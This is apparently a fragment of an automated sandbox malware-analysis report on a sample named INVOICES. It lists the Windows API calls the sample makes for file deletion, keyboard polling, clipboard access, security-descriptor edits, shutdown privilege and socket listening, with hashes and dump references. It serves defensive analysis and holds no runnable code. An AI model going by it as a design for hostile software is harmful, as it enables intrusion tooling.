                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0079F221
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F248
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F25F
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0079F271
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(007E8920), ref: 0079F28F
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0079F299
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F2A6
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F2B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                  • Opcode ID: 86a5e9eda3bc42561940ac1f861a3622ca77362ad17bcacc4f4cbd6a404dd36c
                                                                                                                                  • Instruction ID: 8da4905df0cb20749610c3c181e22f42d65e72db748f743cd47124301f65317f
                                                                                                                                  • Opcode Fuzzy Hash: 86a5e9eda3bc42561940ac1f861a3622ca77362ad17bcacc4f4cbd6a404dd36c
                                                                                                                                  • Instruction Fuzzy Hash: E531D276501659AACF109BB4FC58FEE73ACEF09360F144275E804E31A1DB78DE45CAA8
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0079A299
                                                                                                                                  • __swprintf.LIBCMT ref: 0079A2BB
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0079A2F8
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0079A31D
                                                                                                                                  • _memset.LIBCMT ref: 0079A33C
                                                                                                                                  • _wcsncpy.LIBCMT ref: 0079A378
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0079A3AD
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0079A3B8
                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0079A3C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0079A3CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                  • Opcode ID: 6d6b698f0f10813d07edaf96a7d433488651577f118fa4f47de33f43402547e0
                                                                                                                                  • Instruction ID: bb53fd50bda8c9b96bd76cbfb441f2d0157fbed1419605e72f71a2496bb7f7c5
                                                                                                                                  • Opcode Fuzzy Hash: 6d6b698f0f10813d07edaf96a7d433488651577f118fa4f47de33f43402547e0
                                                                                                                                  • Instruction Fuzzy Hash: 4631B2B550010ABBDB209FA0EC49FEB37BCEF88740F1081B6F908D2160E77896448B65
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007BC266
                                                                                                                                  • GetFocus.USER32 ref: 007BC276
                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 007BC281
                                                                                                                                  • _memset.LIBCMT ref: 007BC3AC
                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007BC3D7
                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 007BC3F7
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 007BC40A
                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007BC43E
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007BC486
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007BC4BE
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 007BC4F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                                  • Opcode ID: e4047df1631da9cf97e5e13564febffe8435a6fa23b0314dbaf3ba0f37da480e
                                                                                                                                  • Instruction ID: 4d4481bd0d8bded2a248c3438646f3bbe323d72462fed325e559e8f783ac8ed0
                                                                                                                                  • Opcode Fuzzy Hash: e4047df1631da9cf97e5e13564febffe8435a6fa23b0314dbaf3ba0f37da480e
                                                                                                                                  • Instruction Fuzzy Hash: 63815B71208341AFD711DF14D894BBBBBE8EF88754F00892EF99597291C778E905CBA2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0078852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00788546
                                                                                                                                    • Part of subcall function 0078852A: GetLastError.KERNEL32(?,0078800A,?,?,?), ref: 00788550
                                                                                                                                    • Part of subcall function 0078852A: GetProcessHeap.KERNEL32(00000008,?,?,0078800A,?,?,?), ref: 0078855F
                                                                                                                                    • Part of subcall function 0078852A: RtlAllocateHeap.NTDLL(00000000,?,0078800A), ref: 00788566
                                                                                                                                    • Part of subcall function 0078852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0078857D
                                                                                                                                    • Part of subcall function 007885C7: GetProcessHeap.KERNEL32(00000008,00788020,00000000,00000000,?,00788020,?), ref: 007885D3
                                                                                                                                    • Part of subcall function 007885C7: RtlAllocateHeap.NTDLL(00000000,?,00788020), ref: 007885DA
                                                                                                                                    • Part of subcall function 007885C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00788020,?), ref: 007885EB
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00788238
                                                                                                                                  • _memset.LIBCMT ref: 0078824D
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0078826C
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0078827D
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 007882BA
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007882D6
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 007882F3
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00788302
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00788309
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0078832A
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00788331
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00788362
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00788388
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0078839C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2347767575-0
                                                                                                                                  • Opcode ID: 69600ba93e674fa49ea666aa409f2efa1cb94b0239f3661fe4d5434710588537
                                                                                                                                  • Instruction ID: 36098cc3282b6d35fe7e600e01b8ea10ba36274ae8285fc31a0d673caa520f56
                                                                                                                                  • Opcode Fuzzy Hash: 69600ba93e674fa49ea666aa409f2efa1cb94b0239f3661fe4d5434710588537
                                                                                                                                  • Instruction Fuzzy Hash: 58617D7194020AEFCF10EFA5DC44EEEBB79FF04700F448269F915A62A1DB389A05CB61
                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$MZER$NO_AUTO_POSSESS)$NO_START_OPT)$Oat$UCP)$UTF)$UTF16)
• API String ID: 0-2780058304
• Opcode ID: 2bf1a266b1e5aa99f68131217c9daa4b4b0c7bda32efc12617033b9c60c8283d
• Instruction ID: 1a402bab6a1f2321daedb70b967c215b56faa989a127560b0c4edc788e387541
• Opcode Fuzzy Hash: 2bf1a266b1e5aa99f68131217c9daa4b4b0c7bda32efc12617033b9c60c8283d
• Instruction Fuzzy Hash: 9F727075E00219DBDF14DF59C8807AEB7B5FF49310F54816AE849EB290EB389E81CB91
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID: 0D}$0D}$ERCP$MZER$Oat$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-3579807247
• Opcode ID: 2bf85eec80d4a34288f6429defd73730fba5bdc3f57b5952a7b9d321f7c5624d
• Instruction ID: 6e31f322044e6cc1d33adf8dc8dda464bf97ff3503c455f53fbdb99de12c85aa
• Opcode Fuzzy Hash: 2bf85eec80d4a34288f6429defd73730fba5bdc3f57b5952a7b9d321f7c5624d
• Instruction Fuzzy Hash: 8AA29070E0421ACBDF28CF58C9447ADB7B1FB54354F24C1AAD859A7280E7789E81EF51
APIs
  • Part of subcall function 007B0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B0537
  • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
  • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007B05D6
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007B066E
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007B08AD
• RegCloseKey.ADVAPI32(00000000), ref: 007B08BA
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
• Opcode ID: d5400deaf03bacdca0ed119d0e89216d61bcd6fc3f3dac77e904ab7cc6cb0f22
• Instruction ID: 6ebe60fd15c6e8e31e2fa12a88bc9734244e9f76ac96cbf8ba333fc1f0a77f38
• Opcode Fuzzy Hash: d5400deaf03bacdca0ed119d0e89216d61bcd6fc3f3dac77e904ab7cc6cb0f22
• Instruction Fuzzy Hash: 45E13D71604210EFCB14DF29C895E6BBBE5EF88714F04856DF48ADB262DB38E905CB91
APIs
• GetKeyboardState.USER32(?), ref: 00790062
• GetAsyncKeyState.USER32(000000A0), ref: 007900E3
• GetKeyState.USER32(000000A0), ref: 007900FE
• GetAsyncKeyState.USER32(000000A1), ref: 00790118
• GetKeyState.USER32(000000A1), ref: 0079012D
• GetAsyncKeyState.USER32(00000011), ref: 00790145
• GetKeyState.USER32(00000011), ref: 00790157
• GetAsyncKeyState.USER32(00000012), ref: 0079016F
• GetKeyState.USER32(00000012), ref: 00790181
• GetAsyncKeyState.USER32(0000005B), ref: 00790199
• GetKeyState.USER32(0000005B), ref: 007901AB
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 314187a7c937e87e7be43af55561e182d0c64b9b83f1f4e32d8dce9fcf71fd20
• Instruction ID: fbfb6e07ce05a5e33e9b4dc65be9e17b69c198405c1233f05c4d999354284658
• Opcode Fuzzy Hash: 314187a7c937e87e7be43af55561e182d0c64b9b83f1f4e32d8dce9fcf71fd20
• Instruction Fuzzy Hash: 4841D9346547CE6EFF318A64AC047B9BEA1BF11340F088099D9C6461C2EB9D99D4C7E2
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 56f7b26b7aa7e4c867122d2238d7a33344d83ca08e91d4fd25afaaba88964fce
• Instruction ID: 8734330f30a5a14c6ba757dc6e66c5093a807493b708a35cc4a876d19555dc25
• Opcode Fuzzy Hash: 56f7b26b7aa7e4c867122d2238d7a33344d83ca08e91d4fd25afaaba88964fce
• Instruction Fuzzy Hash: 5F217E35200210DFEB10AF64DC49F6D7BA8FF84B15F10C216F9469B2A1DB79AC01CB59
APIs
  • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
  • Part of subcall function 00794AD8: GetFileAttributesW.KERNEL32(?,0079374F), ref: 00794AD9
• FindFirstFileW.KERNEL32(?,?), ref: 007938E7
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0079398F
• MoveFileW.KERNEL32(?,?), ref: 007939A2
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007939BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 007939E1
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 007939FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
• Opcode ID: b73a9c429d6c999d77c41b10516ecf0bd315f938bce5e09defe6ff357989593b
• Instruction ID: 946fe0ed8af7971c4785979118602252e3e13be8d63737193aafe20a3d22871c
• Opcode Fuzzy Hash: b73a9c429d6c999d77c41b10516ecf0bd315f938bce5e09defe6ff357989593b
• Instruction Fuzzy Hash: CE51907180510DDADF15EBA0ED9AEEDB778AF14314F648169E44277092EF386F09CB60
APIs
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0079F4CC
• Sleep.KERNEL32(0000000A), ref: 0079F4FC
• _wcscmp.LIBCMT ref: 0079F510
• _wcscmp.LIBCMT ref: 0079F52B
• FindNextFileW.KERNEL32(?,?), ref: 0079F5C9
• FindClose.KERNEL32(00000000), ref: 0079F5DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 713712311-438819550
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
• GetSystemMetrics.USER32(0000000F), ref: 007BD4E6
• GetSystemMetrics.USER32(0000000F), ref: 007BD506
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007BD741
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007BD75F
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007BD780
• ShowWindow.USER32(00000003,00000000), ref: 007BD79F
• InvalidateRect.USER32(?,00000000,00000001), ref: 007BD7C4
• NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 007BD7E7
Similarity
• API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
• String ID:
• API String ID: 830902736-0
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
  • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
• _memmove.LIBCMT ref: 007805AE
• _memmove.LIBCMT ref: 007806C3
• _memmove.LIBCMT ref: 0078076A
Strings
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID: yZt
• API String ID: 1300846289-3009251894
APIs
  • Part of subcall function 00788AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00788AED
  • Part of subcall function 00788AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00788B1A
  • Part of subcall function 00788AA3: GetLastError.KERNEL32 ref: 00788B27
• ExitWindowsEx.USER32(?,00000000), ref: 007952A0
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
Strings
Similarity
• API ID: __itow__swprintf
• String ID: Oat
• API String ID: 674341424-2936667180
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 007A63F2
• WSAGetLastError.WS2_32(00000000), ref: 007A6401
• bind.WS2_32(00000000,?,00000010), ref: 007A641D
• listen.WS2_32(00000000,00000005), ref: 007A642C
• WSAGetLastError.WS2_32(00000000), ref: 007A6446
• closesocket.WS2_32(00000000), ref: 007A645A
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
• NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 007319FA
• GetSysColor.USER32(0000000F), ref: 00731A4E
• SetBkColor.GDI32(?,00000000), ref: 00731A61
  • Part of subcall function 00731290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007312D8
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ColorDialogNtdllProc_$LongWindow
• String ID:
• API String ID: 591255283-0
• Opcode ID: c61ea82701bd9bf6ed2e803e072728ddf34910d490dd243644f810ff95fe8e74
• Instruction ID: 83f31c58bd5598958d82c297a14de341795fa459524260b605df6202b8473848
• Opcode Fuzzy Hash: c61ea82701bd9bf6ed2e803e072728ddf34910d490dd243644f810ff95fe8e74
• Instruction Fuzzy Hash: B8A138B1102584FAF638AA788C49EBF375DDB42382F948119F903D5193DA2CAD41D276
APIs
  • Part of subcall function 007A7EA0: inet_addr.WS2_32(00000000), ref: 007A7ECB
• socket.WS2_32(00000002,00000002,00000011), ref: 007A68B4
• WSAGetLastError.WS2_32(00000000), ref: 007A68DD
• bind.WS2_32(00000000,?,00000010), ref: 007A6916
• WSAGetLastError.WS2_32(00000000), ref: 007A6923
• closesocket.WS2_32(00000000), ref: 007A6937
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
